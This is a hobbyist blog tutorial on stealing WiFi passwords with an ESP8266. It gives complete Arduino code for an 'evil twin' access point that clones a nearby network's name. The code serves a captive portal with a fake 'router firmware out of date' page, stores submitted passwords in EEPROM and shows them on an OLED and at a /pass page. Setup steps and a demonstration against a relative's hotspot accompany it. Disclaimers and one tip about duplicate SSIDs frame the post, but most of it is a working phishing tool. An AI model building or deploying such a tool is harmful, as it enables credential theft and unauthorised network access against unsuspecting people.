How to Know WiFi Password Using ESP8266
Table of Contents
Description:
How to Know WiFi Password Using ESP8266 – In this article, I am going to demonstrate how to retrieve WiFi passwords using the ESP8266 WiFi module, But before we get started, let me tell you.
Disclaimer:
This article is for educational purposes only. I do not promote or encourage any illegal activities, including phishing or hacking. Any techniques or methods discussed are intended to be used responsibly and ethically. Always respect others’ privacy and obtain proper permission before accessing any networks or devices. Remember, unauthorized access to WiFi networks or personal information is against the law and can have serious consequences. Please use the information in this article wisely!
A few days ago, I used a web portal to change the SSID and password on my ESP32 wirelessly. I not only saved the router’s WiFi credentials in the EEPROM, but I also managed to access those WiFi credentials from the EEPROM.
Right at this moment, an exciting idea came to my mind. I realized that someone could potentially retrieve the WiFi password of a nearby WiFi router or mobile hotspot. So, I decided to test this in a controlled environment to demonstrate how such a security vulnerability works and to show you how to protect yourself from it.
Remember, this is an educational demonstration meant to raise awareness about WiFi security.
So, without any further delay, let’s get started!
Amazon Links:
*Please Note: These are affiliate links. I may make a commission if you buy the components through these links. I would appreciate your support in this way!
First, let me explain how this works. When you go to manage Wi-Fi connections, you see a list of available networks. The top-most network, “Engr Fahad,” is the SSID of my WiFi router that I am currently connected to.
Two other networks, “Fawad” and “SherAlam,” are visible but not connected. Both networks show a lock icon, indicating they require a password. “Fawad” is the SSID of my brother’s mobile hotspot, and “SherAlam” is the SSID of my neighbor’s WiFi router.
For this demonstration, I created another WiFi network with the same SSID as my brother’s hotspot, “Fawad.” This can trick someone into clicking on the wrong network and entering their credentials, showing how attackers might exploit such vulnerabilities.
Let me stress again – never use this on someone’s network without their permission. It’s illegal and unethical.
Anyway, I am going to explain how attackers make a Fake WiFi network using ESP8266, well they can also use ESP32 or Raspberry Pi Pico, there are so many WiFi supported controller boards out there. But let’s focus on how they create a fake WiFi Network. You should know about this.
ESP8266 Board Installation in the Arduino IDE:
I am using Nodemcu ESP8266 after a few months and I am not sure if the ESP8266 is still available in the boards list.
You can see ESP8266 is not available in the boards list. I have used it a lot but for the last few months I have been using ESP32 for all my IoT based projects.
Anyway, to install ESP8266 in the Arduino IDE, open this article “Nodemcu ESP8266 Arduino IDE Board Manager URL Link Installation and First Project”.
In this article, I have explained pretty much everything, if you are just getting started with the ESP8266, then you should read this article.
Anyway, you need to copy this URL link.
http://arduino.esp8266.com/stable/package_esp8266com_index.json
Again go to the Arduino IDE, go to the File Menu, and then to preferences.
Now,
- Go to the Tools Menu, then Board, and click on the Boards Manager.
- In the Search box, type esp8266.
- Install ESP8266 by ESP8266 Community. Its going to take several minutes depending on the speed of your internet connection.
As you can see the ESP8266 package has been successfully installed and you can clearly see all the Boards included in this package. Now, let’s go ahead and confirm if the ESP8266 boards are available in the boards list.
So, let’s go to the Tools Menu and then to Board, you can see the ESP8266 Boards have been successfully installed.
I am going to connect my Nodemcu ESP8266 WiFi Module to the Laptop and then I can go ahead and upload this program.
Nodemcu ESP8266 Programming:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 |
// How to Know WiFi Password Using ESP8266 // Libraries #include <ESP8266WiFi.h> #include <DNSServer.h> #include <ESP8266WebServer.h> #include <EEPROM.h> #include <Wire.h> #include <Adafruit_GFX.h> #include <Adafruit_SSD1306.h> // Default SSID name const char* SSID_NAME = "Fawad"; // OLED display settings #define SCREEN_WIDTH 128 #define SCREEN_HEIGHT 64 #define OLED_RESET -1 // Reset pin (not used) Adafruit_SSD1306 display(SCREEN_WIDTH, SCREEN_HEIGHT, &Wire, OLED_RESET); // Default main strings #define SUBTITLE "Router info." #define TITLE "Update" #define BODY "Your router firmware is out of date. Update your firmware to continue browsing normally." #define POST_TITLE "Updating..." #define POST_BODY "Your router is being updated. Please, wait until the process finishes.</br>Thank you." #define PASS_TITLE "Passwords" #define CLEAR_TITLE "Cleared" // Init system settings const byte HTTP_CODE = 200; const byte DNS_PORT = 53; const byte TICK_TIMER = 1000; IPAddress APIP(192, 1, 1, 1); // Gateway String allPass = ""; String newSSID = ""; String currentSSID = ""; // For storing passwords in EEPROM. int initialCheckLocation = 20; // Location to check whether the ESP is running for the first time. int passStart = 30; // Starting location in EEPROM to save password. int passEnd = passStart; // Ending location in EEPROM to save password. unsigned long bootTime = 0, lastActivity = 0, lastTick = 0, tickCtr = 0; DNSServer dnsServer; ESP8266WebServer webServer(80); String input(String argName) { String a = webServer.arg(argName); a.replace("<", "<"); a.replace(">", ">"); a.substring(0, 200); return a; } String footer() { return "</div><div class=q><a>© All rights reserved.</a></div>"; } String header(String t) { String a = String(currentSSID); String CSS = "article { background: #f2f2f2; padding: 1.3em; }" "body { color: #333; font-family: Century Gothic, sans-serif; font-size: 18px; line-height: 24px; margin: 0; padding: 0; }" "div { padding: 0.5em; }" "h1 { margin: 0.5em 0 0 0; padding: 0.5em; }" "input { width: 100%; padding: 9px 10px; margin: 8px 0; box-sizing: border-box; border-radius: 0; border: 1px solid #555555; border-radius: 10px; }" "label { color: #333; display: block; font-style: italic; font-weight: bold; }" "nav { background: #0066ff; color: #fff; display: block; font-size: 1.3em; padding: 1em; }" "nav b { display: block; font-size: 1.5em; margin-bottom: 0.5em; } " "textarea { width: 100%; }"; String h = "<!DOCTYPE html><html>" "<head><title>" + a + " :: " + t + "</title>" "<meta name=viewport content=\"width=device-width,initial-scale=1\">" "<style>" + CSS + "</style>" "<meta charset=\"UTF-8\"></head>" "<body><nav><b>" + a + "</b> " + SUBTITLE + "</nav><div><h1>" + t + "</h1></div><div>"; return h; } String index() { return header(TITLE) + "<div>" + BODY + "</ol></div><div><form action=/post method=post><label>WiFi password:</label>" + "<input type=password name=m></input><input type=submit value=Start></form>" + footer(); } String posted() { String pass = input("m"); pass = "<li><b>" + pass + "</li></b>"; // Adding password in an ordered list. allPass += pass; // Updating the full passwords. // Storing passwords to EEPROM. for (int i = 0; i <= pass.length(); ++i) { EEPROM.write(passEnd + i, pass[i]); // Adding password to existing password in EEPROM. } passEnd += pass.length(); // Updating end position of passwords in EEPROM. EEPROM.write(passEnd, '\0'); EEPROM.commit(); return header(POST_TITLE) + POST_BODY + footer(); } String pass() { return header(PASS_TITLE) + "<ol>" + allPass + "</ol><br><center><p><a style=\"color:blue\" href=/>Back to Index</a></p><p><a style=\"color:blue\" href=/clear>Clear passwords</a></p></center>" + footer(); } String ssid() { return header("Change SSID") + "<p>Here you can change the SSID name. After pressing the button \"Change SSID\" you will lose the connection, so reconnect to the new SSID.</p>" + "<form action=/postSSID method=post><label>New SSID name:</label>" + "<input type=text name=s></input><input type=submit value=\"Change SSID\"></form>" + footer(); } String postedSSID() { String postedSSID = input("s"); newSSID = "<li><b>" + postedSSID + "</b></li>"; for (int i = 0; i < postedSSID.length(); ++i) { EEPROM.write(i, postedSSID[i]); } EEPROM.write(postedSSID.length(), '\0'); EEPROM.commit(); WiFi.softAP(postedSSID); return header("SSID Changed") + "<p>The SSID has been changed to: " + postedSSID + "</p>" + footer(); } String clear() { allPass = ""; passEnd = passStart; // Setting the password end location -> starting position. EEPROM.write(passEnd, '\0'); EEPROM.commit(); return header(CLEAR_TITLE) + "<div><p>The password list has been reseted.</div></p><center><a style=\"color:blue\" href=/>Back to Index</a></center>" + footer(); } void BLINK() { // The built-in LED will blink 5 times after a password is posted. for (int counter = 0; counter < 10; counter++) { // For blinking the LED. digitalWrite(BUILTIN_LED, counter % 2); delay(500); } } void setup() { // Serial begin Serial.begin(115200); bootTime = lastActivity = millis(); EEPROM.begin(512); delay(10); // Initialize the OLED display display.begin(SSD1306_SWITCHCAPVCC, 0x3C); // Address 0x3D for 128x64 display.clearDisplay(); display.setTextSize(1); display.setTextColor(SSD1306_WHITE); // Check whether the ESP is running for the first time. String checkValue = "first"; // This will be set in EEPROM after the first run. for (int i = 0; i < checkValue.length(); ++i) { if (char(EEPROM.read(i + initialCheckLocation)) != checkValue[i]) { // Add "first" in initialCheckLocation. for (int i = 0; i < checkValue.length(); ++i) { EEPROM.write(i + initialCheckLocation, checkValue[i]); } EEPROM.write(0, '\0'); // Clear SSID location in EEPROM. EEPROM.write(passStart, '\0'); // Clear password location in EEPROM EEPROM.commit(); break; } } // Read EEPROM SSID String ESSID; int i = 0; while (EEPROM.read(i) != '\0') { ESSID += char(EEPROM.read(i)); i++; } // Reading stored password and end location of passwords in the EEPROM. while (EEPROM.read(passEnd) != '\0') { allPass += char(EEPROM.read(passEnd)); // Reading the stored password in EEPROM. passEnd++; // Updating the end location of password in EEPROM. } WiFi.mode(WIFI_AP); WiFi.softAPConfig(APIP, APIP, IPAddress(255, 255, 255, 0)); // Setting currentSSID -> SSID in EEPROM or default one. currentSSID = ESSID.length() > 1 ? ESSID.c_str() : SSID_NAME; Serial.print("Current SSID: "); Serial.println(currentSSID); WiFi.softAP(currentSSID); // Start the AP dnsServer.start(DNS_PORT, "*", APIP); // DNS server for Captive Portal webServer.on("/", HTTP_GET, []() { webServer.send(HTTP_CODE, "text/html", index()); }); webServer.on("/post", HTTP_POST, []() { webServer.send(HTTP_CODE, "text/html", posted()); BLINK(); // Blink LED }); webServer.on("/pass", HTTP_GET, []() { webServer.send(HTTP_CODE, "text/html", pass()); }); webServer.on("/ssid", HTTP_GET, []() { webServer.send(HTTP_CODE, "text/html", ssid()); }); webServer.on("/postSSID", HTTP_POST, []() { webServer.send(HTTP_CODE, "text/html", postedSSID()); }); webServer.on("/clear", HTTP_GET, []() { webServer.send(HTTP_CODE, "text/html", clear()); }); webServer.begin(); Serial.println("Server started."); } void loop() { dnsServer.processNextRequest(); webServer.handleClient(); // Update the OLED display every second if (millis() - lastTick >= TICK_TIMER) { lastTick = millis(); display.clearDisplay(); display.setCursor(0, 0); display.println("Current SSID:"); display.println(currentSSID); display.println("Passwords:"); display.println(allPass); display.display(); } } |
I actually downloaded this code from GitHub, I have slightly modified some code to make it work with my setup. I also added code for the SSD1306 Oled display Module. So, I also installed the two libraries.
<Adafruit_GFX.h>
#include <Adafruit_SSD1306.h>
Let me show you how to install these libraries in the Arduino IDE.
Copy the Library name.
Go to the Sketch Menu then to Include Library, and click on the Manage Libraries.
Paste the library name in the search box.
You can see I have already installed this library. Next, search for the SSD1306 library.
I have also installed this library.
// Default SSID name
const char* SSID_NAME = “Fawad”;
This is my brother’s WiFi hotspot name, which I have set as the SSID for the network I created. I could leave it empty or write something else – I am not worried about this because I can change the SSID wirelessly at any time, without hard-coding.
#define BODY “Your router firmware is out of date. Update your firmware to continue browsing normally.”
The web portal will display a message asking him to update his router firmware – something that looks natural but is actually part of the trick.
I have already uploaded this program and now let me show you how this works in practice.
Now, you can see two networks with the same name, “Fawad,” in the list – one is the actual network, and the other is the fake network I created. Let me connect to this network to show you how the web portal actually looks on a laptop.
You can see the SSID and the update message. This looks so real. So, if you see something like this do not enter your password. Here is how it looks on a cell phone.
When someone connects to the fake WiFi network and enters the password, it’s saved in the ESP8266’s EEPROM.
You might wonder how I will know if my brother has entered the password. When the password is entered, the onboard LED will blink five times to notify me. I could also add a buzzer; however, to make it more user-friendly, I have added an I2C supported SSD1306 OLED display module to show the password directly on the screen.
You can follow this circuit diagram.
On the Nodemcu ESP8266 WiFi module D1 is the SCL and D2 is the SDA.
Now, there is no need to place this board in front of me, and I don’t need to keep checking the web portal either.
If he enters the password, it will be displayed on the OLED display module.
I have been waiting for several hours for my brother to enter the password, but he didn’t fall for it since he knew this trick. For the sake of demonstration, I eventually asked him to connect to this WiFi network; so you all could see how it actually works.
Finally, my brother connected to the fake WiFi network and entered his password. The password appeared on the OLED display, and I successfully completed the test.
Now, to check the password on the web portal. In the code, there is an IP address.
192.1.1.1
If you go to this IP address and add /pass, you can check the password.
You can also clear the entered password. It not only clears the password from the web portal but also from the EEPROM.
If you want to change the SSID, you can simply type /ssid and enter a new SSID name.
I ran this demonstration in a controlled environment using my own WiFi networks, including a hotspot I set up with my brother’s name, “Fawad” I made up the story to illustrate how attackers could steal your WiFi credentials if you are not careful.
Always ensure that the network you connect to is the correct one. If you see a duplicate SSID, do not enter your WiFi credentials.
This technique should only be used for entering WiFi credentials wirelessly on the ESP8266 or ESP32 for legitimate purposes, such as IoT setups. Never use it to exploit someone else’s network.
I hope this article helps you understand how attackers can exploit WiFi networks and how to protect yourself. Remember, the goal is to educate and raise awareness, not to cause harm.